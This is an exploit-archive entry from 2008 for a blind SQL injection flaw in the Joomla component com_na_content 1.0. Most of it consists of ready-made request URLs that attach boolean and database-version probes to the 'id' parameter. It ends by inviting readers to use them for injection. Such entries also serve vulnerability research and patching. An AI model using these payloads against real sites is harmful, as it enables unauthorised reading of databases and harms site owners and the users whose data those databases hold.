id: 4566
date: 12/29/2008
title: Joomla Component com_na_content 1.0 Blind SQL Injection Vulnerability
author: xoron
cves: 

=====================================================================
Joomla Component com_na_content 1.0 Blind SQL Injection Vulnerability
=====================================================================


Joomla Component com_na_content 1.0 Blind SQL Injection Vuln

Author: xoron

Exploit: /index.php?option=com_na_content&task=view&id=1 having 1=0
            /index.php?option=com_na_content&task=view&id=1 having 1=1
or

            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4
            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=5

!! You can use this for inj.
!! Thans for Ozan!



#  0day.today [2023-03-25]  #